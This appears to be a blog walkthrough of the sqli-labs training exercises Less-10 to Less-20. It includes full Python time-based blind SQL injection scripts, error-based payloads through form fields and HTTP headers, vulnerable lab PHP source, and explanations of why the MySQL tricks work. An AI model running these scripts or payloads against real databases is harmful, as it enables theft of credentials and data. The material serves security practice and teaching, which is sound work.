    sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(3)) +--+"
    columns = ''
    for num in range(1, column_length + 1):
        for asc in range(32, 128):
            if delayed(sql.format(num=num, asc=asc)):
                columns += chr(asc)
                print("all column names:", columns)
                break
    return columns


def data_length(column_name, table_name):
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(" + column_name + " separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"
        # print(sql)
        if delayed(sql):
            print(column_name, "length of the values:", i)
            return i


def data_detail(data_length, column_name, table_name):
    sql = url + " and if(ascii(substr((select group_concat(" + column_name + " separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"
    data = ''
    for num in range(1, data_length + 1):
        for asc in range(32, 128):
            if delayed(sql.format(num=num, asc=asc)):
                data += chr(asc)
                print(column_name, "values:", data)
                break
    return data


if __name__ == '__main__':
    # database_length()  # 8
    # database_name(8)  # security
    # table_length('security')  # security length of all table names: 29
    # table_name(29, 'security')  # all table names: emails@referers@uagents@users
    # column_length('users', 'security')  # 20
    # column_name(20, 'users', 'security')  # all column names: id@username@password
    # data_length('username', 'users')  # 91
    data_detail(91, 'username', 'users')  # username values: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4

Script

Less-10: time-based blind injection + double-quote closure

Double quote + time-based blind

id=1" and sleep(3)--+

'''
@Modify Time      @Author
------------      -------
2019/10/2 16:56   laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time

url = '192.168.40.165/sqli-labs-master/Less-10/?id=1"'


def delayed(sql):
    '''
    Send sql and return True when the answer took longer than 3 s, i.e. sleep(3) fired.
    requests gives up after 3 s, so a timeout also counts as a delayed answer.
    '''
    s_time = time.time()
    try:
        requests.get(url=sql, timeout=3)
    except requests.exceptions.Timeout:
        return True
    e_time = time.time()
    return (e_time - s_time) > 3


def database_length():
    # the first i for which length(database())>i is false makes the server sleep
    for i in range(1, 10000):
        sql = url + " and if((select length(database()))>" + str(i) + ",0,sleep(3)) +--+"
        print(sql)
        if delayed(sql):
            print("database length:", i)
            return i


def database_name(database_length):
    sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
    db_name = ''
    for num in range(1, database_length + 1):
        for asc in range(ord('a'), ord('z') + 1):
            if delayed(sql.format(num=num, asc=asc)):
                db_name += chr(asc)
                print("database name:", db_name)
                break
    return db_name


def table_length(database_name):
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='" + database_name + "')))>" + str(i) + ",0,sleep(3)) +--+"
        print(sql)
        if delayed(sql):
            print(database_name, "length of all table names:", i)
            return i


def table_name(table_length, database_name):
    sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(3)) +--+"
    table_name = ''
    for num in range(1, table_length + 1):
        for asc in range(32, 128):
            if delayed(sql.format(num=num, asc=asc)):
                table_name += chr(asc)
                print("all table names:", table_name)
                break
    return table_name


def column_length(table_name, database_name):
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='" + database_name + "')))>" + str(i) + ",0,sleep(3)) +--+"
        # print(sql)
        if delayed(sql):
            print(table_name, "length of all column names:", i)
            return i


def column_name(column_length, table_name, database_name):
    sql = url + " and if(ascii(substr((select group_concat(column_name separator '@') from information_schema.columns where table_name='" + table_name + "' and table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(3)) +--+"
    columns = ''
    for num in range(1, column_length + 1):
        for asc in range(32, 128):
            if delayed(sql.format(num=num, asc=asc)):
                columns += chr(asc)
                print("all column names:", columns)
                break
    return columns


def data_length(column_name, table_name):
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(" + column_name + " separator '@') from " + table_name + ")))>" + str(i) + ",0,sleep(3)) +--+"
        # print(sql)
        if delayed(sql):
            print(column_name, "length of the values:", i)
            return i


def data_detail(data_length, column_name, table_name):
    sql = url + " and if(ascii(substr((select group_concat(" + column_name + " separator '@') from " + table_name + "),{num},1))>{asc},0,sleep(3)) +--+"
    data = ''
    for num in range(1, data_length + 1):
        for asc in range(32, 128):
            if delayed(sql.format(num=num, asc=asc)):
                data += chr(asc)
                print(column_name, "values:", data)
                break
    return data


if __name__ == '__main__':
    # database_length()  # 8
    # database_name(8)  # security
    # table_length('security')  # security length of all table names: 29
    # table_name(29, 'security')  # all table names: emails@referers@uagents@users
    # column_length('users', 'security')  # 20
    # column_name(20, 'users', 'security')  # all column names: id@username@password
    # data_length('username', 'users')  # 91
    data_detail(91, 'username', 'users')  # username values: Dumb@Angelina@Dummy@secure@stupid@superman@batman@admin@admin1@admin2@admin3@dhakkan@admin4

Same as Less-9, only the URL changed

POST

Less-11: POST injection

Finally on to the POST ones. When I first opened this page I was completely lost; after browsing a few walkthroughs and with a hint from a blog, I realised the approach is exactly the same as Less-1, just in a different form, perhaps slightly less direct. Orz

Less-12: double quote + parenthesis closure

Zoomed Burp in a bit, hehe.

Less-13:报错注⼊

Background:

These constructions were provided by someone online, but without an explanation [clearly I'm still too much of a noob, I couldn't even understand the answer Orz]

Duplicate entry '::security::0' for key 1

') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.tables group by a # &passwd=1# &submit=Submit

select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.tables group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));

Duplicate entry '::5.0.51a-3ubuntu5::0' for key 1

') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.tables group by a # &passwd=1&submit=Submit

Duplicate entry '5.0.51a-3ubuntu5::security::root@localhost:1' for key 1

') union select 1,2 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd=1&submit=Submit

Duplicate entry '13::1' for key 1

') union select 1,2 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd= ') or 1=1 # &submit=Submit

Duplicate entry 'Dumb::Dumb::1' for key 1

') union select 1,2 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a # &passwd=1&submit=Submit

The first payload,

') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.tables group by a # &passwd=1# &submit=Submit

is equivalent to:

select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.tables group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));

Error type: duplicate primary key.

Whenever count, rand() and group by are used together this error can occur, regardless of where they are placed.

The MySQL documentation points out that the expression after group by is evaluated more than once per row while the result is being built (once to look the key up, and again when the key has to be inserted).

rand(0), being seeded, produces the same sequence on every run, so the error is reliable; the unseeded rand() in the first payloads above triggers it only on some attempts.

concat() simply joins ":", the database name and the result of floor(rand(0)*2) into one string so that the error message is easy to read (0x3a is ':').

0x03 Duplicate primary key

This exploits the way count() and group by behave when rand() produces a repeated key. The payload usually seen online looks like this:

mysql> select count(*) from test group by concat(version(),floor(rand(0)*2));
ERROR 1062 (23000): Duplicate entry '5.7.171' for key '<group_key>'

The error is a duplicate entry, i.e. a duplicate primary key. In fact, as long as count, rand() and group by are used together the error occurs, regardless of their position:

mysql> select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '5.7.171' for key '<group_key>'

The root cause is that floor(rand(0)*2) is not constant, which trips up group by. group by key works by reading the data row by row and keeping the result in a temporary table. For each row the key is read: if the key already exists in the temporary table, that row of the temporary table is updated (its counter is incremented); if it does not, the key and its row are inserted. Take the following table as an example:

mysql> select * from test;
+------+-------+
| id   | name  |
+------+-------+
|    0 | jack  |
|    1 | jack  |
|    2 | tom   |
|    3 | candy |
|    4 | tommy |
|    5 | jerry |
+------+-------+
6 rows in set (0.00 sec)

Using select count(*) from test group by name, the process is roughly as follows.

First an empty virtual table is created, with key as its primary key (no duplicates allowed):

key | count(*)
----+---------

Then the rows are read one by one. For each row the virtual table is checked: if the key is not there, a new record is inserted; if it is, count(*) is simply incremented:

key  | count(*)
-----+---------
jack | 1

key  | count(*)
-----+---------
jack | 1+1

key  | count(*)
-----+---------
jack | 1+1
tom  | 1

key   | count(*)
------+---------
jack  | 1+1
tom   | 1
candy | 1

Things go wrong when this procedure meets rand(0)*2, because rand(0) is a deterministic sequence. Evaluating rand(0) twice gives exactly the same values:

mysql> select rand(0) from test;
+---------------------+
| rand(0)             |
+---------------------+
| 0.15522042769493574 |
|   0.620881741513388 |
|  0.6387474552157777 |
| 0.33109208227236947 |
|  0.7392180764481594 |
|  0.7028141661573334 |
+---------------------+
6 rows in set (0.00 sec)

mysql> select rand(0) from test;
+---------------------+
| rand(0)             |
+---------------------+
| 0.15522042769493574 |
|   0.620881741513388 |
|  0.6387474552157777 |
| 0.33109208227236947 |
|  0.7392180764481594 |
|  0.7028141661573334 |
+---------------------+
6 rows in set (0.00 sec)

Likewise floor(rand(0)*2) always yields the same sequence (this is the important part):

mysql> select floor(rand(0)*2) from test;
+------------------+
| floor(rand(0)*2) |
+------------------+
|                0 |
|                1 |
|                1 |
|                0 |
|                1 |
|                1 |
+------------------+
6 rows in set (0.00 sec)

Back to the group by statement. Change it to select count(*) from test group by floor(rand(0)*2) and follow it step by step:

Start with an empty table:

key | count(*)
----+---------

Read the first record and evaluate floor(rand(0)*2): the result is 0 (1st evaluation). The virtual table has no such key, so floor(rand(0)*2) is evaluated again and that result, 1 (2nd evaluation), is inserted:

key | count(*)
----+---------
1   | 1

Read the second record and evaluate floor(rand(0)*2) again: the result is 1 (3rd evaluation). Key 1 exists in the virtual table, so there is no second evaluation and count(*) is simply incremented:

key | count(*)
----+---------
1   | 1+1

Read the third record and evaluate floor(rand(0)*2): the result is 0 (4th evaluation). Key 0 is not present, so an insert is attempted, which evaluates floor(rand(0)*2) once more; the result 1 (5th evaluation) becomes the primary key of the new row, and key 1 already exists in the virtual table, so the insert fails with a duplicate-key error.

The final result, a duplicate of key '1':

mysql> select count(*) from test group by floor(rand(0)*2);
ERROR 1062 (23000): Duplicate entry '1' for key '<group_key>'

Over the whole query floor(rand(0)*2) was evaluated 5 times and 3 rows of the source table were read, so the table needs at least 3 rows for the error to occur (that is, floor must execute at least 5 times). The MySQL manual says this about rand():

RAND() in a WHERE clause is evaluated for every row (when selecting from one table) or combination of rows (when selecting from a multiple-table join). Thus, for optimizer purposes, RAND()

If a sequence starts 0,1,0 or 1,0,1 the error can never occur, because the first two keys in the virtual table will be 0 and 1, after which every further row just increments count(*):

mysql> select floor(rand(1)*2) from test;
+------------------+
| floor(rand(1)*2) |
+------------------+
|                0 |
|                1 |
|                0 |
|                0 |
|                0 |
|                1 |
+------------------+
6 rows in set (0.00 sec)

mysql> select count(*) from test group by floor(rand(1)*2);
+----------+
| count(*) |
+----------+
|        3 |
|        3 |
+----------+
2 rows in set (0.00 sec)
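The evaluation order walked through above, as an added example that is not part of the original post: a small Python model of the group by temporary table in which the grouping expression is evaluated once for the look-up and once more when a new row is inserted. The two value sequences are the page's floor(rand(0)*2) and floor(rand(1)*2) outputs; the last two values of the rand(1) list are constructed so that six rows can be processed. leaked_value() shows how the page's payloads read the data back out of the error text.

```python
import re

# Added example (not from the original post): a Python model of MySQL's GROUP BY
# temporary table. The key expression is evaluated once to look the key up and,
# when the key is not there yet, once more to build the row that is inserted;
# with a non-constant expression such as floor(rand(0)*2) the second value can
# already be present, which is the ERROR 1062 the payloads on this page rely on.

FLOOR_RAND0 = [0, 1, 1, 0, 1, 1]              # page's floor(rand(0)*2) output
FLOOR_RAND1 = [0, 1, 0, 0, 0, 1, 1, 0]        # page's floor(rand(1)*2) output + 2 constructed values


class DuplicateEntry(Exception):
    """Stands in for ERROR 1062 (23000): Duplicate entry ... for key '<group_key>'."""

    def __init__(self, key, evaluations):
        super().__init__("Duplicate entry '%s' for key '<group_key>'" % key)
        self.key = key
        self.evaluations = evaluations


def simulate_group_by(rows, key_values):
    """Run `select count(*) from t group by <expr>` over `rows` rows.

    key_values yields the successive results of <expr>, one per evaluation.
    Returns ({key: count}, number_of_evaluations) or raises DuplicateEntry.
    """
    next_value = iter(key_values).__next__
    temp = {}                                  # the temporary table: key -> count(*)
    evaluations = 0
    for _ in range(rows):
        key = next_value(); evaluations += 1   # evaluated to look the key up
        if key in temp:
            temp[key] += 1                     # known key: only the counter moves
            continue
        key = next_value(); evaluations += 1   # evaluated again to build the new row
        if key in temp:                        # ...and that second value may already exist
            raise DuplicateEntry(key, evaluations)
        temp[key] = 1
    return temp, evaluations


def run(rows, key_values):
    """Wrapper that turns the outcome into a tuple: ('ok', table, n) or ('error', key, n)."""
    try:
        temp, n = simulate_group_by(rows, key_values)
        return ("ok", temp, n)
    except DuplicateEntry as e:
        return ("error", e.key, e.evaluations)


_DUP = re.compile(r"Duplicate entry '(.*)' for key")


def leaked_value(error_message):
    """Smuggled data in the error text: the key minus the trailing floor() digit.

    For concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand(0)*2)) the key is
    '::security::1' and the leaked value is '::security::'.
    """
    m = _DUP.search(error_message)
    return None if m is None else m.group(1)[:-1]


if __name__ == "__main__":
    print("two rows, rand(0):  ", run(2, FLOOR_RAND0))
    print("three rows, rand(0):", run(3, FLOOR_RAND0))
    print("six rows, rand(1):  ", run(6, FLOOR_RAND1))
    print(leaked_value("ERROR 1062 (23000): Duplicate entry '::security::1' for key '<group_key>'"))
```

With two rows the query succeeds (three evaluations, key 1 counted twice); the third row forces the fifth evaluation and the collision, exactly as counted above. With the rand(1)-style sequence both keys are in the table after two rows and the remaining rows only increment, giving the 3 and 3 of the page.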

Querying the table names:

uname=') union select count(*),concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,floor(rand(0)*2)) as a from information_schema.tables group by a# &passwd=1# &submit=Submit

But I still couldn't get any more detailed data:

It turned out to be a problem with group_concat(); switching to limit 0,1 worked, though I don't know why group_concat failed:

Since I didn't know how many tables the security database holds, I sent the request with increasing limit offsets, and the response lengths showed there are 4 tables:

Querying the column names:

uname=') union select count(*),concat(0x3a,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x3a,floor(rand(0)*2)) as a from information_schema.tables group by a# &passwd=1# &submit=Submit

Sending the same request with the next offsets shows that the emails table has only two columns:

Values of the email_id column:

uname=') union select count(*),concat(0x3a,(select email_id from emails limit 0,1),0x3a,floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd=1# &submit=Submit

Afterword:

While researching I came across a really handy function: name_const().

name_const(): local variables inside MySQL stored procedures are wrapped by an internal function, name_const(); it seems to exist purely for stored procedures, and nothing else special is documented about it. For injection it is useful because name_const(value, 1) names a column after value, so a derived table that contains two such columns fails with ERROR 1060 Duplicate column name '<value>' and the error message carries the data out.

Usage: union select 1,2,3 from (select name_const((your query),1),name_const((your query),1))x #

Querying the table names:

uname=1') union select 1,3 from (select name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1),name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))x#

uname=1') union select 1,3 from (select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema='security'),1),name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema='security'),1))x#

The rest follows the same pattern.

Caveat: this works because the lab's MySQL is 5.0.51a (see the version in the error messages above). Later releases require both arguments of NAME_CONST() to be literal constants and reject a subquery with "Incorrect arguments to NAME_CONST", so the floor(rand(0)*2) technique is the one to fall back on there.

Less-14: double-quote closing + error-based injection (same as 13)

Method one:

uname=1" union select 1,3 from (select name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1),name_const((select table_name from information_schema.tables where table_schema='security' limit 0,1),1))x#&passwd=12&submit=Submit

Method two:

uname=" union select count(*),concat(0x3a,(select email_id from emails limit 0,1),0x3a,floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd=1# &submit=Submit

Less-15: time-based blind injection + single quote

Finally got it written, with some pain, Orz. The table_name() function borrows from another person's script, but I found it very slow to run, so I wrote the rest with if; I couldn't be bothered to change it, so take it as reference only.

'''
@Modify Time      @Author
------------      -------
2019/10/5 18:21   laoalo
'''
import time
import requests

url = "http://192.168.199.190/sqli-labs-master/Less-15/"


def elapsed(uname):
    """POST the login form with the injected uname and return the response time in seconds.

    Every payload below has the form if(<cond>, sleep(N), 1), so a slow answer means
    <cond> was true. (The original mixed time.time() and datetime; one clock is used here.)
    """
    global url
    data = {
        'uname': uname,
        'passwd': 'admin',
        # 'submit': 'Submit'
    }
    print(uname)
    s_time = time.time()
    requests.post(url=url, data=data)
    return time.time() - s_time


def database_length():
    for i in range(1, 10000):
        if elapsed("admin' and if ( length(database()) < %d , sleep(3) , 1)#" % i) > 2:
            print("\t\t\t\tdatabase name length:", i - 1)   # first i with length < i
            break


def database_name(length):
    name = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            if elapsed("admin' and if (ascii (substr(database(), %d, 1))=%d, sleep(3), 1)#" % (j, i)) > 2:
                name += chr(i)
                print("\t\t\t\tdatabase name:", name)
                break


def table_length():
    for i in range(1, 10000):
        if elapsed("admin' and if ( length((select group_concat(table_name) from information_schema.tables where table_schema=database())) < %d , sleep(3) , 1)#" % i) > 2:
            print("\t\t\t\ttotal length of all table names:", i - 1)
            break


def table_name(table_count):
    # This one works the other way round: the answer is fast when the guess is right,
    # so every wrong guess costs a sleep(2), which is why it is so slow.
    char = "abcdefghijklmnopqrstuvwxyz_"
    print("start!")
    tablename = ""
    for i in range(0, table_count):
        print("\nbrute-forcing table %d" % (i + 1))
        for j in range(1, 21):          # mid() positions start at 1; mid(x,0,1) is always ''
            matched = False
            for ch in char:
                # print(ch)
                c = elapsed("admin' and if((mid((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))='%s',1,sleep(2))#" % (i, j, ch))
                if c < 1:
                    tablename += ch
                    matched = True
                    print("table name:", tablename)
                    break
            if not matched:             # no character matched: end of this name
                break
        tablename += "@"                # separator between names (the original ran them together)

    print("\t\t\t\ttable names:", tablename)


def columns_length(table_name):
    for i in range(1, 10000):
        if elapsed("admin' and if ( length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema=database())) < %d , sleep(3) , 1)#" % i) > 2:
            print("\t\t\t\tlength of the column-name list:", i - 1)
            break


def column_name(length, table_name):
    names = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            if elapsed("admin' and if (ascii (substr((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema=database()), %d, 1))=%d, sleep(3), 1)#" % (j, i)) > 2:
                names += chr(i)
                print("\t\t\t\tcolumn names:", names)
                break


def data_length(columns, table):
    for i in range(1, 10000):
        if elapsed("admin' and if ( length((select group_concat(" + columns + ") from " + table + ")) < %d , sleep(3) , 1)#" % i) > 2:
            print("\t\t\t\tlength of all the data:", i - 1)
            break


def data_detail(length, columns, table):
    value = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            if elapsed("admin' and if (ascii (substr((select group_concat(" + columns + ") from " + table + "), %d, 1))=%d, sleep(3), 1)#" % (j, i)) > 2:
                value += chr(i)
                print("\t\t\t\tcolumn values:", value)
                break


if __name__ == '__main__':
    # database_length()
    # database_name(8)
    # table_length()
    # table_name(10)
    # columns_length('emails')
    # column_name(11, 'emails')
    # data_length('email_id', 'emails')
    data_detail(157, 'email_id', 'emails')

Brute-force script

Of course you can also just send the requests one at a time from Burp, e.g. to find the database name length: uname=admin' and if (length(database())>1,0,sleep(3))+--+&passwd=admin&submit=Submit

From the delay you can work out that the database name is 8 characters long.

As for sqlmap, forget it; the whole point is to practise by hand.

Less-16: double quote + parenthesis + time-based blind injection

Same as 15; tweak the script and run it.

Less-17: what looks like a double injection

Here is the source; you can see that uname is filtered:

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    // Step 1: truncate to 15 characters
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }

    // Step 2: strip slashes if magic quotes is enabled.
    // get_magic_quotes_gpc() returns the PHP configuration value magic_quotes_gpc
    // (GPC = Get/Post/Cookie): 0 means the feature is off, 1 means it is on.
    // When it is on, every ' (single quote), " (double quote), \ (backslash) and
    // NULL (null byte) in the request data is automatically escaped with a backslash.
    //
    // stripslashes(string) removes the backslashes added by addslashes().
    // addslashes(string) returns the string with a backslash in front of the
    // predefined characters ' " \ and NULL; it is used to prepare strings for
    // storage in a database and for query strings.
    // Note: with magic quotes on, PHP already runs addslashes() on all GET, POST
    // and COOKIE data, so addslashes() must not be applied a second time (double
    // escaping); use get_magic_quotes_gpc() to detect that situation.
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }

    // Step 3: quote and escape anything that is not a number.
    // ctype_digit(string) returns TRUE if every character is a decimal digit, else FALSE.
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
        // mysql_real_escape_string(string, connection)
        //   string:     required, the string to escape
        //   connection: optional, the MySQL connection; defaults to the last one opened
        // It escapes the special characters \x00, \n, \r, \, ', " and \x1a for use
        // in an SQL statement and returns the escaped string, or FALSE on failure.
    }
    else
    {
        // Step 4: numeric input becomes a plain integer (so no hex injection through this field either)
        $value = intval($value);
        // intval(var[, base])
        //   var:  the value to convert to an integer
        //   base: the base used for the conversion (default 10)
        // intval() returns the integer value of var. It must not be used on objects
        // (E_NOTICE, returns 1). On success it returns the integer value of var, on
        // failure 0; an empty array returns 0, a non-empty array returns 1; the maximum
        // value depends on the operating system. If base is 0 the base is detected
        // from the format of var: a 0x/0X prefix means hexadecimal, a leading 0 means
        // octal, otherwise decimal.
    }
    return $value;
}


// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);

    $passwd=$_POST['passwd'];


    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);


    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        // (HTML output omitted)

        if (mysql_error())
        {
            print_r(mysql_error());
            // (HTML output omitted)
        }
        // (rest of the handler omitted in the original listing)
    }
}
?>

Trying basic injection (through uname) gets nowhere, since check_input() escapes it; the password, on the other hand, is written into the UPDATE statement unescaped, and that statement runs once the SELECT has found the (valid) username.

So, finally, error-based injection through passwd: [ name_const() really is handy ]

uname=admin&passwd=' or (select 1 from (select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a) b) where username='admin'--+#&submit=Submit

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1),name_const((select group_concat(table_name) from information_schema.tables where table_schema='security'),1)) a)--+

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),1),name_const((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='emails'),1)) a)--+

uname=admin&passwd=' or (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a)--+
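The two halves of the Less-17 handler side by side, as an added example that is not the lab's own code: a Python/sqlite3 re-creation of the flow above. check_input() mirrors the PHP function (truncate to 15 characters, quote-and-escape strings, cast digit strings to an integer), the SELECT uses the checked username and the UPDATE interpolates the raw password exactly as the PHP does. Two things differ from the lab and are assumptions of the example: quoting uses sqlite's '' doubling instead of MySQL's backslash escaping, and the MySQL-only parts of the page's payloads (floor(rand(0)*2), name_const) are replaced by a plain WHERE tautology, since the point here is that the password reaches the statement unescaped. The user rows are constructed.

```python
import sqlite3

# Added example, not the lab's code: Less-17's logic on sqlite3, with the
# escaped username path and the raw password path kept as in the PHP, plus a
# parameterised version of the same flow for comparison.

USERS = [("Dumb", "Dumb"), ("admin", "admin"), ("dhakkan", "dumbo")]   # constructed rows


def check_input(value):
    """PHP check_input() equivalent: safe only inside the quoted literal it builds."""
    value = value[:15]                                  # substr($value, 0, 15)
    if value.isdigit():
        return str(int(value))                          # intval($value)
    return "'" + value.replace("'", "''") + "'"         # "'" . escape($value) . "'" (sqlite style)


def setup():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users(username, password) VALUES (?, ?)", USERS)
    return db


def password_reset_vulnerable(db, uname, passwd):
    """The page's logic: escaped username in the SELECT, raw password in the UPDATE.

    Returns the UPDATE statement that was executed, or None when no user matched.
    """
    sql = "SELECT username, password FROM users WHERE username= %s LIMIT 0,1" % check_input(uname)
    row = db.execute(sql).fetchone()
    if row is None:
        return None
    update = "UPDATE users SET password = '%s' WHERE username='%s'" % (passwd, row[0])
    db.execute(update)                                  # second injection point: passwd is unescaped
    return update


def password_reset_fixed(db, uname, passwd):
    """Same flow with bound parameters: the password can never alter the statement."""
    row = db.execute("SELECT username FROM users WHERE username = ? LIMIT 1", (uname[:15],)).fetchone()
    if row is None:
        return None
    db.execute("UPDATE users SET password = ? WHERE username = ?", (passwd, row[0]))
    return row[0]


def passwords(db):
    return dict(db.execute("SELECT username, password FROM users"))


if __name__ == "__main__":
    db = setup()
    # 1. Injection through uname is neutralised by check_input(): no row, so no UPDATE.
    print(password_reset_vulnerable(db, "admin' or '1'='1", "x"), passwords(db))
    # 2. A valid username plus an injected password rewrites every account.
    print(password_reset_vulnerable(db, "admin", "pwned' WHERE 1=1 -- "), passwords(db))
    # 3. With bound parameters the same input is stored literally, for admin only.
    db = setup()
    password_reset_fixed(db, "admin", "pwned' WHERE 1=1 -- ")
    print(passwords(db))
```

The same mechanics carry the page's error-based payloads: on MySQL the expression after `password = '` can be the floor(rand(0)*2) or name_const() subquery, and the error text produced while executing the UPDATE is what gets echoed by the print_r(mysql_error()) in the source.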

Detailed analysis:

Less-18: HTTP header injection, User-Agent

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

    // ... (middle of the file omitted in the original listing) ...

    else
    {
        //echo "Try again looser";
        print_r(mysql_error());
        // (HTML output omitted)
    }

}

The rest is the usual routine.

User-Agent: ' or (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) and '1'='1

Less-19: HTTP header injection, Referer

Exactly the same as 18.

Referer: ' or (SELECT * FROM (SELECT name_const((select group_concat(email_id) from emails),1),name_const((select group_concat(email_id) from emails),1)) a) and '1'='1

Less-20: HTTP header injection, Cookie + code review + error-based injection

See 17 for the details.

Cookie: uname=' or (select 1 from (select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from information_schema.tables group by a) b)#

Things to watch:

Do not use ' --+ ' as the comment:

Do not add the submit parameter:


Article link: https://www.wtabcd.cn/zhishi/a/1699176464207227.html
